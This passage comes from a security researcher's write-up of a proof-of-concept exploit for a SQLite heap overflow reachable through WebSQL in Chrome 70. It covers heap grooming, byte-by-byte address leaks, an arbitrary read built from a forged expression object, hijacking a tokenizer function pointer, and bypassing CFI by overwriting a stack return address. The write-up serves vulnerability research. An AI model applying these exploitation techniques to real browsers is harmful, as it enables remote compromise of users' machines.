The more frequently occurring problem is allocations of unintended objects. All of our heap feng shui revolves around column names, but in order to create column names we have to create tables, and when tables are created, lots of objects are allocated on the heap: the Table object, expression trees, column affinity arrays, the table name string, and the like. These are allocated for every table created, so the more tables are created, the more likely it is that those objects exhaust their respective size class’s freelist and request new chunks from the Central Cache. When the Central Cache’s freelist is also exhausted, it starts stealing pages that were reserved for large chunks. Those pages include the holes we wanted to refill, such as Table6‘s hole in the above illustration. This is a very real possibility, and when the exploit fails in the first couple of stages, this is the reason most of the time. To fix it, one has to create a really long freelist for all the unintended objects allocated upon table creation, so those objects take chunks from that long freelist instead. This is somewhat complicated with TCMalloc, because the thread cache’s freelist has a maximum size, and when the program reaches that limit, the Central Cache keeps stealing some of the chunks from the thread cache’s freelist. This maximum is dynamically increased as TCMalloc sees a lot of heap activity in that size class, but taking full advantage of this requires a deep understanding of the dynamic nature of the freelists and a study of how they can be controlled.
A better way to fix this issue would have been to create one gigantic table with 2000 columns, where all the columns act as a spray. To create holes, an SQL statement would be issued to rename a column, which would free the previous column name. SQLite actually provides a way to do this, but unfortunately the SQLite version Chrome used at the time the vulnerability existed was 3.24.0, in which that functionality was not yet implemented.
The actual best way to deal with this is to pre-create all the tables used in the entire exploit, and whenever the need arises to spray column names, do so with the ALTER TABLE ADD COLUMN statement. The exploit does not specifically address this issue, and should be re-run if it fails during this stage.
After all the spraying and corrupting, the entire process up to stage 6 takes a little over 1 minute in a virtual machine. This is much more manageable than 10 minutes, but 1 minute is still too long for real-world use. As the purpose was to create a proof of concept, the exploit was not improved further to shave off more time, due to time constraints. Nevertheless, we will discuss ideas for eliminating most of the spraying time at the end of the blog post.
Now that everything has been covered, we can proceed to Stage 7.
Stage 7
Stage 7 has only one purpose: place a 0x1000 sized Column object array into the corrupted 0x1000 chunk, and find out which of the column objects inside the array is the one that gets corrupted. This is illustrated below.
After this, it is possible to know which of the 104 columns were corrupted. We can keep that corrupted column index bookmarked, and use it to probe the result of all future corruption attempts.
There is a catch here though. What if the corruption happens after the 104 columns, in one of the columns in the range 104 ~ 128? Since no Column object exists in that range, it would be impossible to know which part of the column object array is corrupted. To fix this, when the exploit determines that the OOB write falls into that specific range, it uses a different apple for the OOB write. Specifically, it uses the apple that’s right in front of the current apple.
By using the apple slot that is 0xa00 before the current apple, the corruption falls back into the 0 ~ 104 range, and Stage 7 can be run again to retrieve the corrupted column. This might fail sometimes, when the previous apple block is actually at a completely random position. When it fails, the exploit should go back to the previous stages, find out which of the other huge blocks of columns got corrupted, and work forward from there. This is not implemented in the exploit, which should simply be run again if it fails during this stage.
Before going to the next stage, Stage 7 uses the OOB write to wipe the corrupted column’s name address field to 0. The reason is that when the table is dropped, SQLite goes through all the Column objects in the array and issues tc_free(column_name_address) for each of them. If the address fed to tc_free was not returned by a previous tc_malloc, the program will crash. Wiping it to 0 makes the call tc_free(0), which is essentially a no-op.
Now that we know which column index was corrupted, we can now proceed to Stage 8.
Stage 8
This is the most fragile part of the exploit.
The first thing Stage 8 tries to achieve is to drop 3 of the 0x1000 chunks, starting from the corrupted one, and fill them back in with controlled chunks. This relies on the fact that when the 0x1000 chunks were sprayed in Stage 6, they were all allocated consecutively, back-to-back. In reality, this is not always the case: sometimes the 0x1000 chunks are allocated sequentially, and then at some point the next allocation suddenly jumps to a random location. This happens frequently with small chunks and only rarely with large chunks. The exploit could have been adapted to work on large chunks, but in the current strategy the 3 chunks had to include the 104 column object array, placed in the first chunk. The reason is that there must be a way to place attacker-controlled arbitrary data on the heap, and no such primitive is available through SQL queries alone: column names, and in fact all names included in an SQL query, are converted to UTF-8 before being stored in memory or the database. To get around that, we use the OOB write itself to write arbitrary payloads into memory. This requires everything to sit behind the 104 column array, so that the address of the arbitrary data can be retrieved and used throughout the exploit. All of this will become clear in Stage 9, and we will also discuss how to remove this requirement in Stage 10. We were not particularly happy with the instability of this stage, but we moved forward because the purpose was to prove exploitability. For now, we’ll just assume that the 3 chunks succeed in being allocated next to each other.
Now we should discuss what kind of 3 chunks are going to be placed.
The first chunk will hold a table of 104 columns. But this time, the corrupted column will point to a column name that is 0x1000 in size. This column name will be filled with B’s.
The second chunk will be that column name, filled with B’s.
The third chunk will be an Fts3Table object.
This sounds easy on paper, but the layout of the first two chunks is more complicated than it sounds. Since those two chunks are created by a single CREATE TABLE query, the freelist has to be constructed carefully so that the two allocations land in that exact order. To make things even more complicated, the freelist gets scrambled differently depending on which column index was corrupted, so it must be massaged in a different way for each possible index. We solved this by deliberately creating holes, deliberately plugging existing holes at different positions in the freelist, changing the order of allocations and frees, and adding garbage columns just to compensate for unwanted holes. This had to be tested for every index in the column array, which was a tedious process. The end result looks something like this.
// Just for good measure. In case there are any holes left behind
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
ft3_spray(statements, 0xD80,"AAAA");
runAll(statements, (event) => {
  sploit8_2();
});
There could be a better way to do this, but this is how it was done. The alternative exploitation strategy discussed in Stage 10 removes the need for this laborious task, so future versions of the exploit should use that strategy instead. Now chunks 1 and 2 are covered. Chunk 3 introduces a new object called Fts3Table. This object is created during the execution of a CREATE VIRTUAL TABLE ... USING fts3 query. Let’s take a glimpse at the function responsible for creating it.
  /* Fill in the azColumn array */
  for(iCol=0; iCol<nCol; iCol++){
    char *z;
    int n = 0;
    z = (char *)sqlite3Fts3NextToken(aCol[iCol], &n);
    if( n>0 ){
      memcpy(zCsr, z, n);
    }
    zCsr[n] = '\0';
    sqlite3Fts3Dequote(zCsr);
    p->azColumn[iCol] = zCsr;
    zCsr += n+1;
    assert( zCsr <= &((char *)p)[nByte] );
  }
  // snipped for brevity
}
/*
** A connection to a fulltext index is an instance of the following
** structure. The xCreate and xConnect methods create an instance
** of this structure and xDestroy and xDisconnect free that instance.
** All other methods receive a pointer to the structure as one of their
** arguments.
*/
struct Fts3Table {
  sqlite3_vtab base;              /* Base class used by SQLite core */
  sqlite3 *db;                    /* The database connection */
  const char *zDb;                /* logical database name */
  const char *zName;              /* virtual table name */
  int nColumn;                    /* number of named columns in virtual table */
  char **azColumn;                /* column names.  malloced */
  u8 *abNotindexed;               /* True for 'notindexed' columns */
  sqlite3_tokenizer *pTokenizer;  /* tokenizer for inserts and queries */
  char *zContentTbl;              /* content=xxx option, or NULL */
  char *zLanguageid;              /* languageid=xxx option, or NULL */
  int nAutoincrmerge;             /* Value configured by 'automerge' */
  u32 nLeafAdd;                   /* Number of leaf blocks added this trans */

  /* Precompiled statements used by the implementation. Each of these
  ** statements is run and reset within a single virtual table API call.
  */
  sqlite3_stmt *aStmt[40];
  sqlite3_stmt *pSeekStmt;        /* Cache for fts3CursorSeekStmt() */

  char *zReadExprlist;
  char *zWriteExprlist;

  int nNodeSize;                  /* Soft limit for node size */
  u8 bFts4;                       /* True for FTS4, false for FTS3 */
  u8 bHasStat;                    /* True if %_stat table exists (2==unknown) */
  u8 bHasDocsize;                 /* True if %_docsize table exists */
  u8 bDescIdx;                    /* True if doclists are in reverse order */
  u8 bIgnoreSavepoint;            /* True to ignore xSavepoint invocations */
  int nPgsz;                      /* Page size for host database */
  char *zSegmentsTbl;             /* Name of %_segments table */
  sqlite3_blob *pSegments;        /* Blob handle open on %_segments table */

  int nIndex;                     /* Size of aIndex[] */
  struct Fts3Index {
    int nPrefix;                  /* Prefix length (0 for main terms index) */
    Fts3Hash hPending;            /* Pending terms table for this index */
  } *aIndex;
  int nMaxPendingData;            /* Max pending data before flush to disk */
  int nPendingData;               /* Current bytes of pending data */
  sqlite_int64 iPrevDocid;        /* Docid of most recently inserted document */
  int iPrevLangid;                /* Langid of recently inserted document */
  int bPrevDelete;                /* True if last operation was a delete */
};

struct sqlite3_vtab {
  const sqlite3_module *pModule;  /* The module for this virtual table */
  int nRef;                       /* Number of open cursors */
  char *zErrMsg;                  /* Error message from sqlite3_mprintf() */
  /* Virtual table implementations will typically add additional fields */
};
There are several noteworthy things in this function. First, the Fts3Table object is dynamically sized: it is sized to encompass all of the column names, which are stored in the object itself. Because column names are user controlled, the entire size of the Fts3Table is user controlled. This means we can place an Fts3Table chunk into an arbitrary size-class freelist of our choosing. Next, there is a member, azColumn, which points somewhere inside the object itself. If this value can be leaked, it can be used to calculate the object's address. Next, there is a member called base. This base member is a struct with a member called pModule, which points into the .data section of the SQLite library. By leaking this address, it is possible to bypass ASLR. Finally, there is a member called db. This points to an sqlite3 object, which is allocated when the WebSQL database is first opened. This occurs very early during exploitation, so we can expect this object to be somewhere near the beginning of the heap. All of these fields will be utilized later on during exploitation.
For now, we just want this Fts3Table object to be allocated as the third chunk. As mentioned above, since the column names are embedded in the Fts3Table object, its size is completely controlled, so we can make it use the 0x1000 size freelist. However, there is one thing to keep in mind: before this chunk is created, a Table object is also created (because an fts3 table is also just a regular table). This means the column name will actually be stored in two places, creating two 0x1000 chunks, which is undesirable. To get around this issue, we need the column name of the Table object to use a freelist other than the 0x1000 freelist. The boundary for a chunk being placed in the 0x1000 freelist is 0xD00: any chunk smaller than that is placed in the 0xD00 freelist instead. Therefore, we can create an fts3 table with a column name smaller than 0xD00, and that name will take a chunk from the 0xD00 freelist. On the other hand, the combined size of the Fts3Table object calculated above in line 53 would be bigger than 0xD00, making it grab a chunk from the 0x1000 freelist. Problem solved. Now the Fts3Table object can be nicely placed in the third chunk.
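The size-class reasoning above can be sketched as a toy model. Note this is only an illustration of the 0xD00/0x1000 boundary described in the text; the real allocator bucketing is more involved, and the FTS3_HEADER constant below is a hypothetical struct overhead, not a measured value.

```python
# Toy model of the freelist choice described above: a column name smaller
# than 0xD00 takes a 0xD00 chunk, while the larger combined Fts3Table
# allocation (struct header plus embedded names) takes a 0x1000 chunk.
FTS3_HEADER = 0x100  # hypothetical struct overhead, for illustration only

def freelist_for(size):
    return 0xD00 if size < 0xD00 else 0x1000

name_len = 0xC80  # chosen so the standalone name stays under the boundary
assert freelist_for(name_len) == 0xD00                 # Table's copy of the name
assert freelist_for(FTS3_HEADER + name_len) == 0x1000  # the Fts3Table object
```

With a name length in this window, the Table's copy and the Fts3Table land in different freelists, which is exactly the separation the grooming needs.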
The following illustration is what happens next in Stage 8.
Now we know the 1st, 2nd, and 3rd bytes of the second chunk's address. We will not bruteforce the 4th byte just yet: without knowing the byte's range, there is a risk of hitting unmapped memory. Instead, we will proceed to leak the 5th and 6th bytes in Stage 9.
Stage 9
An address consists of 8 bytes in total, but for the purpose of leaking, we only need 6 of them. This is because the heap grows upwards from the lowest address, and it would have to grow by several hundred gigabytes to make the 7th byte of the address flip from 0 to 1. In Stage 9, the 5th and 6th bytes will be leaked one at a time. The method differs from Stage 8: this time, it is not possible to bruteforce the byte, because setting it to an arbitrary value makes SQLite hit unmapped memory when it tries to access the column name. Therefore, the bytes have to be leaked exactly, using a different method. This is made possible by actually reading the bytes out as column names.
This was actually not possible until the 3 bytes of the second chunk were leaked in Stage 8. Armed with knowledge of those 3 bytes, we can cook up the following scenario.
There are a couple of things to mention before progressing. First, it was surprising that SQLite accepts almost anything as a column name, including spaces, newlines, and special characters; all that was needed was to surround the entire column name with quotes. However, checking for the existence of such a column is not as simple as issuing a SELECT statement. For some reason, the tokenizer handling the SELECT statement would eat everything between the quotes and treat it like a *. Testing other queries, we came across INSERT. By surrounding the column name with parentheses and quotes, it was possible to test whether certain column names existed, even when they included whitespace and special characters.
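The INSERT-based probe can be reproduced with plain SQLite; the sketch below uses Python's sqlite3 module for illustration, and the table and column names are arbitrary examples.

```python
import sqlite3

con = sqlite3.connect(":memory:")
# SQLite accepts nearly anything as a quoted column name,
# including spaces, newlines, and control characters.
weird = 'a b\nc\x01'
con.execute('CREATE TABLE t ("%s" TEXT, normal TEXT)' % weird)

def column_exists(name):
    # Probe by naming the column, in parentheses and quotes, in an INSERT.
    try:
        con.execute('INSERT INTO t ("%s") VALUES (1)' % name)
        return True
    except sqlite3.OperationalError:
        return False

assert column_exists(weird)        # the oddly named column is found
assert not column_exists("nope")   # a missing column raises an error
```

The error-versus-success distinction is the whole oracle: the attacker never reads the name back, only learns whether a guessed name exists.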
All of this seems perfect, and it also gives rise to another question. Why not just leak all bytes using this method? Unfortunately, things are slightly more complicated.
The biggest problem with this method is that it can only leak bytes that fall into the ASCII range. In the above illustration, the 6th byte is fine and will be leaked without issues. However, the 5th byte falls outside the ASCII range, and will not be leaked. The reason is that when we issue an SQL statement, any characters in a column name at or above \x80 are treated as Unicode by SQLite and internally converted to UTF-8. It is the converted UTF-8 bytes that get memcmp'd byte by byte against the column name that resides in memory. For instance, if we probe for a column "\xC0", SQLite converts it into its UTF-8 form "\xC3\x80", and "\xC3\x80" is compared against what lies in memory. Only if the two match does SQLite deem the column to exist. This brings up a serious problem: bytes can only be leaked with a 50% success rate. However, as luck would have it, the 6th byte is always within the ASCII range, because as explained earlier, it would take several dozen GBs of spray to push the 6th byte above 0x80. Therefore, there is no issue with the 6th byte. The problem is the 5th byte.
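The UTF-8 conversion behind the 50% limitation is easy to reproduce directly:

```python
# A probed column-name byte at or above 0x80 is treated as a Unicode code
# point and re-encoded as UTF-8 before SQLite compares it against memory.
probe = "\xC0"
assert probe.encode("utf-8") == b"\xc3\x80"  # two bytes reach memcmp, not one
# ASCII bytes survive the conversion unchanged, so they can be probed exactly:
assert "A".encode("utf-8") == b"A"
```

So a single in-memory byte of 0xC0 can never match, since the probe always arrives at the comparison as the two-byte sequence C3 80.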
It would be sad to have to live with the 5th byte issue and simply pray that it falls within the ASCII range. Fortunately, this can be fixed. The following illustrates how.
Technically, the memcpy isn’t actually copying backwards. It’s just starting from a lower offset than 0x7FFFFFFF, such as 0x7FFFFFF0, and then copying all the way up to 0x80000000.
With this, it is possible to leak almost any byte by constructing a Unicode lookup table. Constructing this table requires some time and effort, so it was not implemented in the exploit, but it would be the right way to correct this issue. Also, since the Unicode library used by SQLite does not do a one-to-one mapping over all Unicode characters, but rather translates them programmatically, there could be clever ways to abuse the Unicode engine to produce a sequence of bytes that can be looked up easily, without having to construct a full-blown table. This is left as an exercise for the interested reader. The exploit simply tests the 5th byte and, if it falls outside the ASCII range, prints that the exploit should be run again after fully closing and reopening Chrome, in the hope of getting a better 5th byte value.
After this stage, the exploit can finally start bruteforcing the 4th byte.
Based on the values that were leaked from the topmost bytes, the exploit runs a series of heuristics to guess the start value for bruteforcing, so that it falls within a mapped region, as well as making sure that the value is lower than the actual byte to be leaked. The actual heuristics would look as follows.
if (fts3_azColumn_leaked_byte_count >= 3) {
  console.log(`Truncate it on purpose. We're still gonna brute the 4th byte because we don't know whether the leaked 4th byte is case insensitive and hence, inaccurate`);
}
This would handle all cases. Afterwards, the same logic in Stage 8 is applied to bruteforce the 4th byte. Now all 6 bytes of the address have been leaked. It’s time to proceed to Stage 10 and create an AAR.
Stage 10
If we can’t leak exact values from column names because of the unicode restriction, then how is it possible to create an AAR?
For this, we are going to use another field in the Column object that hasn’t been covered in detail, which is the Default Value. It is possible to set a default value using the following SQL statement.
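For illustration, a default value can be declared in CREATE TABLE and exercised with an INSERT that omits the column; the sketch below uses Python's sqlite3 module, and the table and column names are placeholders.

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE t (id INTEGER, data TEXT DEFAULT 'hello')")
# Inserting without naming `data` makes SQLite materialize the default value,
# which it fetches by walking the column's stored expression tree.
con.execute("INSERT INTO t (id) VALUES (1)")
assert con.execute("SELECT data FROM t").fetchone()[0] == "hello"
```

This INSERT-triggers-default behavior is exactly the mechanism the later stages abuse with a fake expression tree.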
As a reminder, the following is the definition of the Column object.
/*
** information about each column of an SQL table is held in an instance
** of this structure.
*/
struct Column {
  char *zName;     /* Name of this column, \000, then the type */
  Expr *pDflt;     /* Default value of this column */
  char *zColl;     /* Collating sequence. If NULL, use the default */
  u8 notNull;      /* An OE_ code for handling a NOT NULL constraint */
  char affinity;   /* One of the SQLITE_AFF_... values */
  u8 szEst;        /* Estimated size of value in this column. sizeof(INT)==1 */
  u8 colFlags;     /* Boolean properties. See COLFLAG_ defines below */
};
These default values are stored in the pDflt field of the Column object. They are not stored as a plain stream of bytes, but in what SQLite calls an expression tree. Expressions represent parts of an SQL statement, usually the trailing portions such as the WHERE clause: the user-configurable parts of a query, where different keywords and sub-statements change how the query behaves. The entire expression is represented as a tree so that SQLite can process it recursively. The default value specified at the end of the CREATE TABLE statement is also treated as part of an expression, and is stored within such a tree. Let's look at the definition of the Expr structure.
struct Expr {
  u8 op;           /* Operation performed by this node */
  char affinity;   /* The affinity of the column or 0 if not a column */
  u32 flags;       /* Various flags. EP_* See below */
  union {
    char *zToken;  /* Token value. Zero terminated and dequoted */
    int iValue;    /* Non-negative integer value if EP_IntValue */
  } u;

  /* If the EP_TokenOnly flag is set in the Expr.flags mask, then no
  ** space is allocated for the fields below this point. An attempt to
  ** access them will result in a segfault or malfunction.
  *********************************************************************/

  Expr *pLeft;     /* Left subnode */
  Expr *pRight;    /* Right subnode */
  /* snipped for brevity */
};
Like any other tree, it has a left and right node pointer, and it has certain flags and a pointer that points to the actual node data. Let’s see how a default value looks in memory.
(gdb) p *(Expr*)0x74b6c0
$26 = {
op = 143 '\217',
affinity = 0 '\000',
flags = 8438784,
u = {
zToken = 0x1337 <error: Cannot access memory at address 0x1337>,
    iValue = 4919
  },
}
This might seem a little complicated at first glance. The only thing important in the Expr object is the opcode, the flags, and the zToken. Here is how the above series of objects would look in a more graphical fashion.
Here is what we want to achieve, in order to gain AAR.
We create a fake Expr object. The Expr object represents a leaf node (EP_TokenOnly | EP_Leaf), so SQLite won't go looking into the pLeft and pRight members, and the node is marked static (EP_Static), so SQLite won't free the zToken member when it disposes of the expression tree. Then, the opcode is set to OP_String, so that SQLite treats the address that zToken points to as a NULL terminated string.
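A byte-level sketch of the fake Expr, using the field values from the gdb dump above. The `<BBxxIQ` layout (op, affinity, 2 padding bytes, flags, then the union as an 8-byte pointer) is an assumption based on the x86-64 alignment of the struct definition shown earlier.

```python
import struct

def fake_expr(op, flags, token_addr):
    # u8 op, char affinity, 2 bytes padding, u32 flags,
    # then the union { char *zToken; int iValue; } as an 8-byte pointer.
    return struct.pack("<BBxxIQ", op, 0, flags, token_addr)

# op = 143, flags = 8438784 (0x80C400), u.zToken = 0x1337, as in the dump.
payload = fake_expr(143, 0x80C400, 0x1337)
assert len(payload) == 16
assert payload[8:16] == (0x1337).to_bytes(8, "little")
```

Only these leading fields need to be forged: with EP_TokenOnly set, SQLite never touches pLeft/pRight, so the payload can stop at the union.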
The next question is where are we going to write this fake Expr object?
This brings up the requirement that was presented in Stage 8. The reason we wanted the three chunks in order is that we could then assume the column object array (the first chunk) is placed right before the leaked second chunk. With the objects laid out that way, both writing arbitrary data representing the fake Expr object and retrieving that object's address are instantly solved. This is depicted in the following pictures.
This explains why the precondition in Stage 8 was required. However, we should at least discuss how this requirement can be eliminated, because having the 3 chunks allocated sequentially is the least reliable part of the entire exploit, and it would be nice if there was a way to avoid it. In order to get rid of the requirement, the following steps can be taken.
At the beginning of Stage 8, allocate a bunch of 0x2000 chunks. Then deallocate one of the 0x2000 chunks in the middle.
Drop the table that holds the 0x1000 chunk, and allocate a column array with 104 column names. The corrupted column index will allocate a column name of size 0x2000. This places the column object array back in its 0x1000 spot, and places the 0x2000 column name into the hole that was created in step 1.
Execute Stage 8 to leak the lower 3 bytes of the 0x2000 chunk address.
Corrupt the column name address so that it points to the next 0x2000 chunk.
Use the INSERT statement to find which table is responsible for that chunk.
Drop that table. Place the Fts3Table chunk there.
Corrupt the column name address so that it points to the 0x2000 chunk that’s after the Fts3Table.
Use the INSERT statement to find which table is responsible for that chunk.
Drop that table. Place a 0x2000 chunk with arbitrary data on there, that could be used for the fake Expr object.
Now we have 3 chunks allocated sequentially, and the address of all three chunks are known.
This is far more reliable and precise than the "pray that the three 0x1000 chunks are next to each other" method. The only problem is finding a primitive with which an arbitrarily sized chunk can be allocated with attacker-controlled data. This cannot be done with column names because of the UTF-8 conversion. How to find such a primitive is discussed at the end of the blog post, in the "Increasing Speed and Reliability" section.
Now back to the Expr objects. The final question is how the fake Default Value object could be used to read data from an arbitrary address. After all, only the default value has been set, and SQLite has no way to read the default value out of the table.
This is true and not true. It is impossible to issue a query to read the default value that was set by the CREATE TABLE statement. However, it is possible to indirectly read it. The logic behind it is simple.
We INSERT a single value into the corrupted table using an innocent column, and let SQLite write the default value of the corrupted column into the table. Under the hood, SQLite goes through each entry in the Column object array and checks whether it has a Default Value expression tree set. If it is 0, SQLite fills that column of the new row with NULL. If it sees an address, it follows the expression tree and parses it. SQLite sees our fake Expr object and sees that it is a leaf node. It looks at the node's opcode, sees OP_STRING, and therefore treats the node value as a string address: it grabs the NULL terminated string from that address and uses it to fill the new row's column data. Since SQLite does all of this by itself, there is no UTF-8 conversion involved; the value is simply treated as a NULL terminated string and copied as-is.
Later, we can SELECT that value from the table and read it back out. Since the column type of the corrupted column is set to BLOB, SQLite treats the underlying value as a series of hex bytes and returns it to the user. For the user to actually see the data in its original form, the result can be passed through the hex() or quote() function, converting the bytes into a series of ASCII characters that represent the hex data.
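The BLOB readback path is ordinary SQLite behavior and can be verified directly; the sketch below uses Python's sqlite3 module for illustration.

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE t (v BLOB)")
con.execute("INSERT INTO t VALUES (x'41424300')")  # raw bytes, NUL included
row = con.execute("SELECT hex(v), quote(v) FROM t").fetchone()
assert row == ("41424300", "X'41424300'")  # both render the bytes as hex text
```

Because the bytes come back hex-encoded, arbitrary binary leaked through the fake Expr survives the trip to JavaScript intact.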
This is how the AAR is constructed: we indirectly read data by INSERTing, then SELECTing. Since the AAR can only read strings up to a NULL byte, all data is read one byte at a time, and the resulting bytes are combined into an array where they can be processed later. Using this, it is possible to leak all data in the Fts3Table object, including the very first member, which bypasses ASLR. We are going to further abuse this AAR to read more interesting things.
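The byte-at-a-time accumulation can be sketched as follows; `read_string` stands in for the INSERT/SELECT primitive described above and is a hypothetical callback, not code from the exploit.

```python
def read_bytes(read_string, addr, n):
    # Each call returns the bytes up to (but not including) the first NUL,
    # so the terminator itself is re-added and the read resumes past it.
    out = []
    while len(out) < n:
        out.extend(read_string(addr + len(out)))
        out.append(0)  # the NUL byte that stopped the string copy
    return bytes(out[:n])

# Simulated target memory for the sketch:
mem = b"\x41\x00\x42\x43\x00\x44\x00"

def fake_read(addr):
    return list(mem[addr:mem.index(0, addr)])

assert read_bytes(fake_read, 0, 6) == mem[:6]
```

The key trick is re-inserting the NUL that terminated each read, so regions containing zero bytes are still recovered exactly.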
Stage 11
Now the final problem is how to control $RIP.
The current situation is that AAR is achieved, but AAW isn't. Therefore, in order to skip AAW, it would be desirable to find a code execution primitive in one of the objects we can OOB write into. In the current heap layout, the only object with potentially interesting fields lying within the bounds of the OOB write is the third chunk, the Fts3Table object. Remember this?
That is the object we want to corrupt. We can start from the first chunk which is the topmost chunk in the above picture, OOB write while protecting the column array data all the way to the end of the first chunk, then all the way to the end of the second chunk, and start corrupting fields in the Fts3Table object. Now the question is if there is any interesting field that would lead to code execution.
After scavenging through the fts3 Virtual Table Methods, we came across this function.
/* Free any prepared statements held */
sqlite3_finalize(p->pSeekStmt);
for(i=0; i<SizeofArray(p->aStmt); i++){
  sqlite3_finalize(p->aStmt[i]);
}

sqlite3_free(p->zSegmentsTbl);
sqlite3_free(p->zReadExprlist);
sqlite3_free(p->zWriteExprlist);
sqlite3_free(p->zContentTbl);
sqlite3_free(p->zLanguageid);

/* Invoke the tokenizer destructor to free the tokenizer. */
p->pTokenizer->pModule->xDestroy(p->pTokenizer);

sqlite3_free(p);
return SQLITE_OK;
}
The line of importance is highlighted. p->pTokenizer is a field within the Fts3Table object, located at offset 0x48 from its beginning. The function reads that field, dereferences it a couple of times, and uses the final value as a function pointer. This is a perfect code control primitive. In assembly, line 49 looks like this.
So what we’re trying to achieve looks like the following.
After finding the primitive, a payload was constructed to control $RIP. This was built against a debug build of Chromium. After that, the exploit was ported to the vulnerable Chrome stable version (v70.0.3538.77). While porting it, a peculiar thing happened: $RIP would no longer be controlled, but would jump to a UD2 instruction instead. At first, we suspected some custom exception handler logic was snatching the SIGSEGV, but it turned out to be something else. Observing the program right before $RIP was controlled, we realized that the above assembly had changed and contained additional logic in the release build. It looked like the following.
This was obviously some kind of Control Flow Integrity logic. The program was checking if the call destination was in a certain range, and if it wasn’t, it would ruthlessly jump to UD2, terminating the process.
This was interesting, because there had been no mention of CFI being enabled on Windows builds, so it was surprising to encounter a CFI implementation on Linux. In fact, there is a page on the Chromium website that explains CFI, and it states that CFI is currently only implemented on Linux and slated to be released on other platforms some time in the future. All of this is great, but what it means for an exploit writer is that the CFI has to be bypassed.
The go-to way to bypass CFI is to achieve AAR/AAW before getting code execution, and work forwards from there. Right now, we only have AAR and no AAW. The first idea for achieving AAW was to manipulate the expression trees representing the Default Value of a Column object, because during our experiments with fake Expr objects, playing with various flags and values led to all kinds of interesting crashes. So conjuring an AAW by creating the right sequence of expression nodes was one way to deal with it. However, this required another deep dive into how SQLite handles expression trees, and a scavenge through the source code of all the opcodes and their accompanying functions.
What we decided to use instead were the artifacts lying right in front of us: the list of functions that the CFI allows us to call.
For CFI checks on other parts of the code, the function list that CFI permits is very narrow.
In this case, CFI only allows jumping to 8 functions that are predefined in a jump table.
However, in our case, we had a choice of 260 functions to jump to.
That is a lot of functions. With such a big list, we just might be able to find a function matching certain criteria that would aid in exploitation. Calling into functions that the CFI allows in this way is called Counterfeit Object Oriented Programming (COOP). It is a term coined in academia to describe constructing Turing-complete gadget sets using only functions that the CFI allows; in essence, a generic CFI bypass technique, provided there is a long enough list of functions to choose from. The paper calls each of these CFI-compliant functions a vfgadget. We will use this term in the remainder of the blog post, as a short way of saying "CFI-compliant function gadget". In the paper, the goal is to create a Turing-complete set of vfgadgets, by finding various vfgadgets that serve different purposes, the most important being the Main Loop vfgadget. For our purposes, however, it is not required to find all of these vfgadgets. We only need to find exactly one, because AAR is already achieved. The reason will be explained in the following section.
There are actually 2 ways to abuse COOP. Both of them will be discussed in the following sections.
Bypassing CFI by gaining AAW
The first way to bypass CFI is to construct an AAW with one of the vfgadgets. What we looked for was a function of this type.
The goal was to call a vfgadget of the above form, and gain AAW. The function did not have to look exactly like the above listing, but anything that would lead to AAW would work. While scavenging through the list of vfgadgets, several functions were found that matched the criteria. However, most of the functions were of this form.
test_function() {
    ...  // A looooooooooooot of things going on here.
    ...
}
Before and after our AAW primitive was triggered, an abundance of code executed. Because all code within the function uses the this pointer, which points to our payload, there were many ways for the program to crash unless care was taken to build a proper fake object that passed all the pointer dereferences and conditional checks. Therefore, it was desirable to find a much shorter vfgadget that still achieved the goal. After an hour of scavenging, we came across this vfgadget.
This is not actually a perfect vfgadget, but it serves our purpose perfectly and is simple enough to deal with. What this vfgadget gives us is an AAW primitive, because at the time of the call, $RDI points to attacker-controlled payload. With a bit of puzzle matching, it is possible to create an AAW primitive that writes a controlled QWORD into an address of our choosing.
Now this brings up the next question. Where are we going to overwrite?
Because the entire binary is compiled with CFI, function pointers are not a good target. The go-to method for bypassing CFI after gaining AAW is going for a stack return address. This is no longer possible on recent mobile platforms (hello PAC, and its soon-to-be-born companion, Memory Tagging), but the desktop counterpart, Intel CET, has not arrived yet, so the stack remains the perfect, and easiest, target.
This brings up the next problem of actually finding the stack. This is easy once AAR is achieved. The stack can be found by following a list of pointers, and the return address can be calculated from the leaked values. Our AAW target was the return address for the above vfgadget. Once the AAW is triggered, it would write an attacker controlled value into the return address which the vfgadget was originally supposed to return to. After the vfgadget is done executing, it would return to our stack pivot gadget, and kick start the ROP chain. To find that return address, it was required to find the WebSQL Database thread’s stack. In order to find that stack address, we first searched for Chrome’s Main Thread stack address. The Main Thread’s stack address is sprinkled on the main stack’s heap, which resides right behind the Chrome image executable in memory. Since this is the main thread’s heap, it is brk‘d and grows right behind the Chrome image.
It was found that certain stack addresses from the main Chrome thread lay at the same location on every run, even across reboots. The one with the lowest index was chosen, because it was probably allocated during the earliest phase of Chrome's execution, and so can be assumed to be allocated there deterministically across runs. Even if that's not the case, we can use the AAR to do a heuristic search dynamically in JavaScript.
Next, we searched for a WebSQL Stack address within the Main Stack.
The WebSQL stack index would change slightly between runs, so this was not a reliable way to leak the WebSQL stack. Perhaps the reason is that on each run there are slight changes in Chrome's environment based on data saved on disk, or different data received from Google's servers introduces a different sequence of function calls, or an alloca with a different size, making the WebSQL data on the stack shift around a little at a time. However, there is a more reliable way. We already leaked one of the main stack's addresses in the previous phase. This is probably the address of a stack variable used in a certain function's stack frame. If the function that encompasses the leaked stack variable is somewhere far down in the stack, it is relatively free of the stack variance described earlier: any functions called further down are called in a deterministic fashion, lowering the stack frame by a fixed amount on each call. As it happens, the distance between the leaked main stack variable and the WebSQL stack address residing on the main stack is constant, at 0x1768 bytes. Subtracting 0x1768 from the first leak gives the location of the WebSQL stack address that we want to leak. The same concept applies to the target return address on the WebSQL stack: subtracting 0x9C0 from the second leaked value yields its exact position. Since we know the location of the return address, we can construct a COOP payload that will AAW a stack pivot gadget right on top of it.
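The two fixed-offset subtractions can be summarized as below; 0x1768 and 0x9C0 are the constants measured for this particular build, and the example leak value is arbitrary.

```python
MAIN_TO_WEBSQL_SLOT = 0x1768  # main-stack leak -> WebSQL stack address slot
WEBSQL_TO_RETADDR   = 0x9C0   # WebSQL stack leak -> target return address

def websql_slot(main_stack_leak):
    return main_stack_leak - MAIN_TO_WEBSQL_SLOT

def target_retaddr(websql_stack_leak):
    return websql_stack_leak - WEBSQL_TO_RETADDR

# Example with an arbitrary leaked value:
leak = 0x7FFD_DEAD_BEE8
assert websql_slot(leak) == leak - 0x1768
```

Because both deltas are fixed for the build, two AAR reads plus two subtractions pinpoint the return address without any stack scanning.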
